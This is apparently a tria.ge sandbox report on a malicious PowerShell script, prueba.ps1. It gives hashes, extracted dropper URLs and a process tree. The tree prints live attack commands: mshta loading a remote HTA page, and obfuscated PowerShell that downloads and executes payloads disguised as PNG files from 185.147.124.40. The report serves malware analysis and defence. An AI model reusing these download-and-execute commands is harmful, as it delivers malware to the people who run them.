Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

prueba.ps1

windows7-x64

10

prueba.ps1

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    18/11/2024, 15:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    prueba.ps1

  • Size

    124B

  • MD5

    6542fcabb69f2e45e5abb6ef369d6b4b

  • SHA1

    a9e758873a6c57d87b7e3bf02cfc04be6959d59b

  • SHA256

    fd4dd13239fcd0e3171711951768b399b1b2210af3e6b4f7cc1c0a594bff7133

  • SHA512

    6f9a75d4e17909c0dea87683bec1286964b8b21db927650c72db8b33df37b07a16b84bd56db42a5055e20c1895821b541467812dc03d5cefb4a144cebb2afb26

Score
10/10
execution

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://185.147.124.40/Capcha.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.147.124.40/x/8.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.147.124.40/x/4.png

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\prueba.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2508
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://185.147.124.40/Capcha.html
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2164
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://185.147.124.40/x/8.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Windows\system32\ipconfig.exe
          "C:\Windows\system32\ipconfig.exe" /flushdns
          4⤵
          • Gathers network information
          PID:112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://185.147.124.40/x/4.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2924
        • C:\Windows\system32\ipconfig.exe
          "C:\Windows\system32\ipconfig.exe" /flushdns
          4⤵
          • Gathers network information
          PID:1832

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    1e97cdeb650179fea1d1dd7e98f2cd27

    SHA1

    a9ca893e9391ea8e6f8f1a0f9dea31c8cfd7442f

    SHA256

    00f543df333ee72ba371f4df90e32ef9fc14327352823c8e30eec4c2e00604ae

    SHA512

    b938861dbf04dc46b2ac673be270de2c98ea02b77abc3dba617ea72c567abdf73efaf77bbaf8c91cee92ea982ed55d9b423bf45340fab7764f807503ed16920c

    Download Submit

  • memory/1616-26-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2508-7-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2508-10-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2508-9-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2508-8-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2508-11-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2508-12-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2508-4-0x000007FEF578E000-0x000007FEF578F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2508-6-0x0000000002770000-0x0000000002778000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2508-5-0x000000001B750000-0x000000001BA32000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2924-25-0x000000001B630000-0x000000001B912000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2924-28-0x0000000002B40000-0x0000000002B5A000-memory.dmp

    Filesize

    104KB

    Download